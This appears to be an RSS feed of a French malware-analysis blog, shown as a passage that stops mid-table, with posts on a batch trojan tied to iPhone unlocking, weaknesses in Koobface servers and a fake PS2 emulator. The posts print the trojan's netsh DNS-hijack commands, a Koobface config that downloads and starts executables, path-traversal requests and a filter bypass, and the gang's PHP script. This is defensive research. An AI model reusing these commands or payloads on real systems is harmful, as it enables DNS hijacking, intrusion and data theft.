<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    <title>Malware Analysis &amp; Diagnostic</title>
    <link>http://mad.internetpol.fr/</link>
    <description>Cellule de veille et d'étude de codes malveillants</description>
    <dc:language>fr</dc:language>
    <generator>Serendipity 1.4 - http://www.s9y.org/</generator>
    <pubDate>Thu, 15 Apr 2010 09:08:33 GMT</pubDate>

    <image>
        <url>http://mad.internetpol.fr/templates/default/img/s9y_banner_small.png</url>
        <title>RSS: Malware Analysis &amp; Diagnostic - Cellule de veille et d'étude de codes malveillants</title>
        <link>http://mad.internetpol.fr/</link>
        <width>100</width>
        <height>21</height>
    </image>

<item>
    <title>iPhone - Trojan.BAT.AACL</title>
    <link>http://mad.internetpol.fr/archives/64-iPhone-Trojan.BAT.AACL.html</link>
    
    <comments>http://mad.internetpol.fr/archives/64-iPhone-Trojan.BAT.AACL.html#comments</comments>
    <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=64</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=2.0&amp;type=comments&amp;cid=64</wfw:commentRss>
    

    <author>nospam@example.com (Joe)</author>
    <content:encoded>
    &lt;p&gt; Plusieurs messages ce matin pour des informations relatives aux articles publiés sur les communautés d&#039;accros aux iPhone, iPad, etc...&amp;#160; des billets alarmistes comme: &amp;quot;&lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=873&amp;amp;entry_id=64&quot;  onmouseover=&quot;window.status=&#039;http://iphoneaddict.fr/post/news-2595-un-nouveau-trojan-menace-la-securite-des-pc-et-des-iphone&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Un nouveau Trojan menace la sécurité des PC et des iPhone&quot;&gt;Un nouveau Trojan menace la sécurité des PC et des iPhone&lt;/a&gt;&amp;quot; - rassurez-vous, vous pourrez continuer à bidouiller vos jouets, il ne s&#039;agit que d&#039;un petit &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=876&amp;amp;entry_id=64&quot;  onmouseover=&quot;window.status=&#039;http://en.wikipedia.org/wiki/Batch_file&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Wikipedia: Batch File&quot;&gt;fichier batch&lt;/a&gt;.&lt;/p&gt; &lt;video tabindex=&quot;0&quot; src=&quot;http://mad.internetpol.fr/media/iphonebat.ogv&quot; controls=&quot;true&quot; autoplay=&quot;true&quot;&gt; &lt;/video&gt; &lt;p&gt;&lt;font size=&quot;1&quot; style=&quot;font-family: courier new,courier,monospace;&quot;&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;Local Area Connection&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;wireles network connection&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;Local Area Connection 2&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;Local Area Connection 1&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;wireles network connection 1&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;wireles network connection 2&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;LAN&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;LAN 1&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;LAN 2&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;WAN&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;WAN 1&amp;quot; static 188.210.236.250&lt;br /&gt;C:\WINDOWS\system32\netsh.exe interface ip set dns &amp;quot;WAN 2&amp;quot; static 188.210.236.250&lt;/font&gt;&lt;br /&gt;&lt;/p&gt; &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=874&amp;amp;entry_id=64&quot;  onmouseover=&quot;window.status=&#039;http://www.malwarecity.com/blog/iphone-unlocking-tricks-get-pcs-into-trouble-791.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;MalwareCity (BitDefender) - iPhone Unlocking Tricks get PCs into Trouble&quot;&gt;MalwareCity (&lt;span style=&quot;font-style: italic;&quot;&gt;BitDefender&lt;/span&gt;) - iPhone Unlocking Tricks get PCs into Trouble&lt;/a&gt;&lt;br /&gt; &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=875&amp;amp;entry_id=64&quot;  onmouseover=&quot;window.status=&#039;http://ddanchev.blogspot.com/2010/04/iphone-unlocking-themed-malware.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Dancho Danchev - iPhone Unlocking Themed Malware Campaign Spamvertised&quot;&gt;Dancho Danchev - iPhone Unlocking Themed Malware Campaign Spamvertised&lt;/a&gt;&lt;br /&gt; 
    </content:encoded>

    <pubDate>Thu, 15 Apr 2010 08:21:00 +0200</pubDate>
    <guid isPermaLink="false">http://mad.internetpol.fr/archives/64-guid.html</guid>
    
</item>
<item>
    <title>Les faiblesses des scripts Koobface peuvent taper sur le .sys</title>
    <link>http://mad.internetpol.fr/archives/63-Les-faiblesses-des-scripts-Koobface-peuvent-taper-sur-le-.sys.html</link>
    
    <comments>http://mad.internetpol.fr/archives/63-Les-faiblesses-des-scripts-Koobface-peuvent-taper-sur-le-.sys.html#comments</comments>
    <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=63</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=2.0&amp;type=comments&amp;cid=63</wfw:commentRss>
    

    <author>nospam@example.com (Matt)</author>
    <content:encoded>
    Voilà maintenant de très nombreux mois que j&#039;attendais une opportunité permettant d&#039;introduire quelques remarques en relation avec Koobface. Un message du &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=868&amp;amp;entry_id=63&quot; title=&quot;http://isc.sans.org/diary.html?storyid=8482&quot;  onmouseover=&quot;window.status=&#039;http://isc.sans.org/diary.html?storyid=8482&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;SANS - &amp;quot;.sys&amp;quot; Directories Delivering Driveby Downloads&lt;/a&gt; complété par un billet du &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=860&amp;amp;entry_id=63&quot; title=&quot;http://blog.scansafe.com/journal/2010/3/23/sys-folders-and-malware.html&quot;  onmouseover=&quot;window.status=&#039;http://blog.scansafe.com/journal/2010/3/23/sys-folders-and-malware.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;ScanSafe STAT Blog&lt;/a&gt; - A peu près tous les chercheurs ont exploités les faiblesses et maladresses du gang Ali baba &amp;amp; 40 , les auteurs de Koobface. C&#039;est par messages dissimulés qu&#039;ils communiquent leurs humeurs. 
Par exemple: &lt;span style=&quot;font-style:italic&quot;&gt;&amp;quot;We express our high gratitude to &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=861&amp;amp;entry_id=63&quot; title=&quot;http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html&quot;  onmouseover=&quot;window.status=&#039;http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;Dancho Danchev&lt;/a&gt; for the help in bug fixing, researches and documentation for our software.&amp;quot;&lt;/span&gt; et encore bien d&#039;autres comme &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=862&amp;amp;entry_id=63&quot; title=&quot;http://www.fireeye.com/&quot;  onmouseover=&quot;window.status=&#039;http://www.fireeye.com/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;FireEye&lt;/a&gt;, &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=863&amp;amp;entry_id=63&quot; title=&quot;http://garwarner.blogspot.com/2009/09/koobface-wrecks-search-results.html&quot;  onmouseover=&quot;window.status=&#039;http://garwarner.blogspot.com/2009/09/koobface-wrecks-search-results.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;Gary Warner&lt;/a&gt;, ... &lt;p&gt;Début 2009, avant notre billet &lt;a class=&quot;bb-url&quot; target=&quot;_blank&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; onmouseover=&quot;window.status=&#039;http://mad.internetpol.fr/archives/45-Koobface-La-confiance-accordee-a-vos-relations-doit-cesser..html&#039;;return true;&quot; title=&quot;http://mad.internetpol.fr/archives/45-Koobface-La-confiance-accordee-a-vos-relations-doit-cesser..html&quot; href=&quot;exit.php?url_id=864&amp;amp;entry_id=63&quot;&gt;Koobface: La confiance accordée à vos relations doit cesser.&lt;/a&gt;
nous avions tenté de décortiquer les liens, caractéristiques,
fonctionnalités, arguments, valeurs, ... et nous avions vite repéré les
faiblesses. Pour comprendre, prenons un exemple:
&lt;/p&gt; 
&lt;p&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;http://........../.sys/?action=ldgen&amp;amp;a=1&amp;amp;v=14&amp;amp;l=1&amp;amp;c_fb=1&amp;amp;c_ms=1&amp;amp;c_hi=1&amp;amp;c_tw=1&amp;amp;c_be=1&amp;amp;c_tg=1&amp;amp;c_nl=1
&lt;/font&gt;&lt;/p&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;#BLACKLABEL&lt;br /&gt;#GEO=FR&lt;br /&gt;#IP=x.x.x.x&lt;br /&gt;USELIGHT|1&lt;br /&gt;START|http://.............../.sys/?getexe=p.exe&lt;br /&gt;START|http://.............../.sys/?getexe=pp.14.exe&lt;br /&gt;START|http://.............../.sys/?getexe=v2newblogger.exe&lt;br /&gt;START|http://.............../.sys/?getexe=v2bloggerjs.exe&lt;br /&gt;START|http://.............../.sys/?getexe=v2captcha21.exe&lt;br /&gt;STARTONCE|http://.............../.sys/?getexe=hosts2.exe&lt;br /&gt;STARTONCE|http://.............../.sys/?getexe=go.exe&lt;br /&gt;STARTONCE|http://.............../.sys/?getexe=v2webserver.exe&lt;br /&gt;MD5|21a877ca943fbd7725c3bd7a2ca87ab1&lt;/font&gt; 
&lt;p&gt;Vous constatez que la présence du &amp;quot;.sys&amp;quot; est effectivement caractéristique.
&lt;/p&gt; 
&lt;p&gt;A l&#039;époque, il était possible de consulter n&#039;importe quel fichier sur les serveurs web distants en exploitant une vulnérabilité de type LFI
&lt;/p&gt; 
&lt;p&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;http://.........../.sys/?getexe=exemple.txt

&lt;/font&gt;&lt;/p&gt; 
&lt;p&gt;En utilisant un parcours récursif, nous avions démontré qu&#039;il était possible d&#039;extraire les données des fichiers sensibles.
&lt;/p&gt; 
&lt;p&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;http://.........../.sys/?getexe=./../../../../../../../etc/passwd

&lt;/font&gt;&lt;/p&gt; 
&lt;p&gt;Après corrections, certaines requêtes passaient encore.
&lt;/p&gt; 
&lt;p&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;http://.........../.sys/?getexe=.htaccess

&lt;/font&gt;&lt;/p&gt; 
&lt;p&gt;Ce qui était très pratique, il faut l&#039;avouer, mais nouvelles corrections.
&lt;/p&gt; 
&lt;p&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;http://.........../.sys/?getexe=index.php

&lt;/font&gt;&lt;/p&gt; 
&lt;p&gt;En imaginant comment ils auraient pu corriger, il a été facile de bypass les vérifications.
&lt;/p&gt; 
&lt;p&gt;&lt;font size=&quot;1&quot; face=&quot;arial,helvetica,sans-serif&quot;&gt;GET /.sys/?getexe=i/n/d/e/x.php
&lt;/font&gt;&lt;/p&gt; 
&lt;p&gt; &lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;&amp;lt;?&lt;br /&gt;/*&lt;br /&gt;if ($_REQUEST[&#039;file&#039;] == &amp;quot;gr.05.exe&amp;quot;){&lt;br /&gt;&amp;#160;$fp = fopen(&amp;quot;qqq.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;&amp;#160;fputs($fp, date(&amp;quot;Y-m-d H:i:s\t&amp;quot;).$_REQUEST[&#039;ip&#039;].&amp;quot;\t&amp;quot;.$_SERVER[&#039;REMOTE_ADDR&#039;].&amp;quot;\n&amp;quot;);&lt;br /&gt;&amp;#160;fclose($fp);&lt;br /&gt;}&lt;br /&gt;*/&lt;br /&gt;$dd = date(&amp;quot;YmdH&amp;quot;);&lt;br /&gt;$dd = ($dd == &amp;quot;2009120318&amp;quot; || $dd == &amp;quot;2009120319&amp;quot; || $dd == &amp;quot;2009120320&amp;quot; || $dd == &amp;quot;2009120321&amp;quot; || $dd == &amp;quot;2009120322&amp;quot;);&lt;br /&gt;&lt;br /&gt;if (isset($_REQUEST[&#039;file&#039;]) &amp;amp;&amp;amp; $_REQUEST[&#039;file&#039;] == &amp;quot;test&amp;quot;) {&lt;br /&gt;&amp;#160;print &amp;quot;KROTEG&amp;quot;;&lt;br /&gt;&amp;#160;exit();&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;if (isset($_REQUEST[&#039;file&#039;]) &amp;amp;&amp;amp; strlen($_REQUEST[&#039;file&#039;])&amp;gt;0 &amp;amp;&amp;amp; $_REQUEST[&#039;file&#039;] != &amp;quot;index.php&amp;quot;) {&lt;br /&gt;&amp;#160;$fname = preg_replace(&amp;quot;#[^a-z\.0-9]#is&amp;quot;, &amp;quot;&amp;quot;, $_REQUEST[&#039;file&#039;]);&lt;br /&gt;&lt;br /&gt;&amp;#160;/*&lt;br /&gt;&amp;#160;if ($fname == &amp;quot;tw.04.exe&amp;quot;) {&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; $fp=fopen(&amp;quot;tw.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; if ($fp)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; {&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; fwrite($fp,&amp;quot;1&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; fclose($fp);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; }&amp;#160;&amp;#160;&amp;#160; &lt;br /&gt;&lt;br /&gt;&amp;#160;}&lt;br /&gt;&amp;#160;*/&lt;/font&gt; &lt;/p&gt; 
&lt;p&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;&lt;br /&gt;&amp;#160;$cont = file_get_contents($fname);&lt;br /&gt;&amp;#160;$size = strlen($cont);&lt;br /&gt;&amp;#160;header(&amp;quot;Content-Type: application/octet-stream&amp;quot;);&lt;br /&gt;&amp;#160;header(&amp;quot;Cache-Control: private&amp;quot;, false);&lt;br /&gt;&amp;#160;header(&amp;quot;Content-Transfer-Encoding: binary&amp;quot;);&lt;br /&gt;&amp;#160;header(&amp;quot;Accept-Ranges: bytes\r\n&amp;quot;);&lt;br /&gt;&amp;#160;header(&amp;quot;Content-Length: &amp;quot; . $size . &amp;quot;\r\n&amp;quot;);&lt;br /&gt;&amp;#160;header(&amp;quot;Content-Disposition: inline; filename=&amp;quot;.$fname);&lt;br /&gt;&amp;#160;print $cont;&lt;br /&gt;&lt;br /&gt;&amp;#160;if ($dd) {&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; $fp = fopen(&amp;quot;file.log&amp;quot;, &amp;quot;a+&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; fputs($fp, date(&#039;r&#039;) . &amp;quot;|&amp;quot; . $_REQUEST[&#039;ip&#039;] . &amp;quot;|&amp;quot; . $_SERVER[&#039;REMOTE_ADDR&#039;] . &amp;quot;|&amp;quot; . $_REQUEST[&#039;file&#039;] . &amp;quot;\n&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; fclose($fp);&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; if (isset($_REQUEST[&#039;ip&#039;])) {&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; $fp = fopen(&amp;quot;bad.log&amp;quot;, &amp;quot;a+&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; fputs($fp, $_REQUEST[&#039;ip&#039;] . &amp;quot;\n&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; fclose($fp);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; }&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; $fp = fopen(&amp;quot;sys2.log&amp;quot;, &amp;quot;a+&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; fputs($fp, $_SERVER[&#039;REMOTE_ADDR&#039;] . &amp;quot;\n&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; fclose($fp);&lt;br /&gt;&amp;#160;} &lt;br /&gt;} else if (isset($_REQUEST[&#039;file2&#039;]) &amp;amp;&amp;amp; strlen($_REQUEST[&#039;file2&#039;])&amp;gt;0 &amp;amp;&amp;amp; $_REQUEST[&#039;file2&#039;] != &amp;quot;index.php&amp;quot;) {&lt;br /&gt;&amp;#160;$fname = preg_replace(&amp;quot;#[^a-z\.0-9]#is&amp;quot;, &amp;quot;&amp;quot;, $_REQUEST[&#039;file2&#039;]);&lt;br /&gt;&amp;#160;/*&lt;br /&gt;&amp;#160;if ($fname == &amp;quot;tw.04.exe&amp;quot;) {&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; $fp=fopen(&amp;quot;tw.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; if ($fp)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; {&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; fwrite($fp,&amp;quot;1&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; fclose($fp);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; }&amp;#160;&amp;#160;&amp;#160; &lt;br /&gt;&lt;br /&gt;&amp;#160;}&lt;br /&gt;&amp;#160;*/&lt;br /&gt;&amp;#160;$cont = file_get_contents($fname);&lt;br /&gt;&amp;#160;$size = strlen($cont);&lt;br /&gt;&amp;#160;header(&amp;quot;Content-Type: application/octet-stream&amp;quot;);&lt;br /&gt;&amp;#160;header(&amp;quot;Cache-Control: private&amp;quot;, false);&lt;br /&gt;&amp;#160;header(&amp;quot;Content-Transfer-Encoding: binary&amp;quot;);&lt;br /&gt;&amp;#160;header(&amp;quot;Accept-Ranges: bytes\r\n&amp;quot;);&lt;br /&gt;&amp;#160;header(&amp;quot;Content-Length: &amp;quot; . $size . &amp;quot;\r\n&amp;quot;);&lt;br /&gt;&amp;#160;header(&amp;quot;Content-Disposition: inline; filename=&amp;quot;.$fname);&lt;br /&gt;&amp;#160;print $cont;&lt;br /&gt;&lt;br /&gt;&amp;#160;if ($dd) {&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; $fp = fopen(&amp;quot;file2.log&amp;quot;, &amp;quot;a+&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; fputs($fp, date(&#039;r&#039;) . &amp;quot;|&amp;quot; . $_REQUEST[&#039;ip&#039;] . &amp;quot;|&amp;quot; . $_SERVER[&#039;REMOTE_ADDR&#039;] . &amp;quot;|&amp;quot; . $_REQUEST[&#039;file2&#039;] . &amp;quot;\n&amp;quot;);&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; fclose($fp);&lt;br /&gt;&amp;#160;} &lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;exit ;&lt;br /&gt;?&amp;gt;&lt;/font&gt; &lt;/p&gt; 
&lt;p&gt;Ce n&#039;est qu&#039;un exemple permettant d&#039;illustrer l&#039;étendu des énormités.
Le pire dans l&#039;histoire, au cas où vous n&#039;auriez pas encore compris, c&#039;est que ces serveurs sont piratés, ils n&#039;appartiennent pas aux cybercriminels.
J&#039;ai ainsi observé des cas d&#039;intrusions et compromissions qui ont été facilités suite à la fuite d&#039;informations sensibles liées à ces brèches antérieures.
C&#039;est dans ces moments là qu&#039;on apprécie &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=865&amp;amp;entry_id=63&quot;  target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;Snort&lt;/a&gt; et ses &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=866&amp;amp;entry_id=63&quot; title=&quot;http://emergingthreats.net/rules/&quot;  onmouseover=&quot;window.status=&#039;http://emergingthreats.net/rules/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;règles&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=870&amp;amp;entry_id=63&quot; title=&quot;http://lastwatchdog.com/koobface-evolved-stay-step/&quot;  onmouseover=&quot;window.status=&#039;http://lastwatchdog.com/koobface-evolved-stay-step/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;How Koobface has evolved to stay a step ahead&lt;/a&gt;&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=871&amp;amp;entry_id=63&quot; title=&quot;http://lastwatchdog.com/facebook-phishers-breached-corporate-network/&quot;  onmouseover=&quot;window.status=&#039;http://lastwatchdog.com/facebook-phishers-breached-corporate-network/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;How Facebook phishers breached a corporate network&lt;/a&gt;&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=872&amp;amp;entry_id=63&quot; title=&quot;http://www.viruslist.com/en/weblog?weblogid=208188045&quot;  onmouseover=&quot;window.status=&#039;http://www.viruslist.com/en/weblog?weblogid=208188045&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;&lt;strong&gt;Koobface C&amp;amp;C servers steadily dropping - new spike coming soon?&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;&lt;/p&gt; 
    </content:encoded>

    <pubDate>Wed, 24 Mar 2010 11:24:32 +0100</pubDate>
    <guid isPermaLink="false">http://mad.internetpol.fr/archives/63-guid.html</guid>
    
</item>
<item>
    <title>Malware : PS2 Emulators - Play 2 Emulator ?</title>
    <link>http://mad.internetpol.fr/archives/62-Malware-PS2-Emulators-Play-2-Emulator.html</link>
    
    <comments>http://mad.internetpol.fr/archives/62-Malware-PS2-Emulators-Play-2-Emulator.html#comments</comments>
    <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=62</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=2.0&amp;type=comments&amp;cid=62</wfw:commentRss>
    

    <author>nospam@example.com (Joe)</author>
    <content:encoded>
    &lt;p&gt;Exploiter les péchés des Hommes demeure la recette à succès par excellence - les distributions s&#039;effectuent par le biais de diverses &amp;quot;vitrines&amp;quot;.&lt;br /&gt;
Avec des mots clés comme: &lt;em&gt;&amp;quot;FREE&amp;quot;, &amp;quot;PORN&amp;quot;, &amp;quot;MONEY&amp;quot;, &amp;quot;WAREZ&amp;quot;, &amp;quot;CRACK&amp;quot;, &amp;quot;SERIAL&amp;quot;, &amp;quot;PATCH&amp;quot;, &amp;quot;KEYGEN&amp;quot;, ...&lt;/em&gt;&lt;br /&gt;
Le pire dans l&#039;histoire, c&#039;est que l&#039;internaute a la sensation de réaliser une &amp;quot;bonne affaire&amp;quot;, bien conditionné, il va commettre des imprudences.&lt;br /&gt;
Il constatera peut-être, à sa grande surprise, qu&#039;il s&#039;est fait duper et qu&#039;il en subira durement les conséquences.&lt;br /&gt;
Vous avez fauté ? Tant pis pour vous et cessez d&#039;imaginer qu&#039;un nettoyage sera &lt;u&gt;LA&lt;/u&gt; solution.&lt;br /&gt;
Comme on dit, &lt;font size=&quot;4&quot; face=&quot;arial,helvetica,sans-serif&quot;&gt;&amp;quot;Café bouillu, café foutu!&amp;quot; ( Coffee boiled, is coffee spoiled! )&lt;/font&gt;&lt;br /&gt; &lt;br /&gt;
Ces faux portails et faux blogs vous proposent de télécharger
gratuitement des applications, aussi bien pour vos ordinateurs que vos
téléphones et toutes sortes d&#039;appareils, ... et l&#039;article de &lt;em&gt;Christopher Boyd&lt;/em&gt; (aka &lt;a title=&quot;Twitter paperghost&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=841&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;https://twitter.com/paperghost&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;PaperGhost&lt;/a&gt;) intitulé
&amp;quot;&lt;a title=&quot;sunbeltblog - Christopher Boyd aka PaperGhost - consoles for old games come with new malcode&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=842&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;http://sunbeltblog.blogspot.com/2010/03/consoles-for-old-games-come-with-new.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Consoles for old games come with new malcode&lt;/a&gt;&amp;quot; souligne que les consoles de jeux ( émulateurs ) semblent être
de bons appâts. Ce qui a particulièrement attiré notre attention,
c&#039;est cette remarque: &lt;br /&gt;&lt;/p&gt; 
&lt;address&gt;
Download and run any of the above files | all hosted at movieutilitesonline(dot)com &lt;/address&gt; 
&lt;address&gt;
and you&#039;ll probably be wondering where the alleged emulator is that is &amp;quot;by far superior &lt;/address&gt; 
&lt;address&gt;
to all other PS2 Emulators released before it.&amp;quot; A pair of files will be dropped onto &lt;/address&gt; 
&lt;address&gt;
your PC, including a randomly named executable in the Windows directory and xpysys.dll &lt;/address&gt; 
&lt;address&gt;
in your System32 Folder. In some cases, people have reported this particular attack &lt;/address&gt; 
&lt;address&gt;
resulting in rogue antivirus appearing on the compromised system – however, during &lt;/address&gt; 
&lt;address&gt;
testing nothing was downloaded onto the PC. This doesn&#039;t mean it won&#039;t happen...&lt;br /&gt;&lt;/address&gt; 
&lt;p&gt;
Comme nous surveillons ces activités et que nous n&#039;avions pas décelé
d&#039;anomalies sur ces derniers échantillons, cela nous a intrigués. Nous
avons contacté Chris B. over Twitter pour obtenir des infos complémentaires sur sa
configuration au moment des tests. Puis après quelques manipulations,
nous sommes arrivés à la conclusion que ce dropper, chargé de déposer
la bibliothèque dans &lt;font face=&quot;courier new,courier,monospace&quot;&gt;%windir%\system32&lt;/font&gt;, comportait une anomalie
sur son packer. Pendant nos investigations, nous avons été étonné de
l&#039;absence de détails, d&#039;informations, sur ces fichiers et c&#039;est
principalement la raison de ce billet.&lt;/p&gt; 
&lt;p&gt; &lt;/p&gt; Nous ne détaillerons pas le circuit de distribution, on peux simplement dire que des noms de domaines sont enregistrés au préalables et que chaque jour plusieurs sont &amp;quot;activés&amp;quot;. La fréquence des modifications sur les pages des affiliés est élevée. Ci-dessous, les configurations des derniers &amp;quot;lots&amp;quot; de DNS.&lt;br /&gt;&lt;br /&gt; 
&lt;address&gt;&lt;font size=&quot;1&quot; face=&quot;courier new,courier,monospace&quot;&gt;AS&amp;#160;&amp;#160;&amp;#160; | IP&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; | BGP Prefix&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; | CC | Registry | Allocated&amp;#160; | AS Name&lt;/font&gt;&lt;/address&gt; 
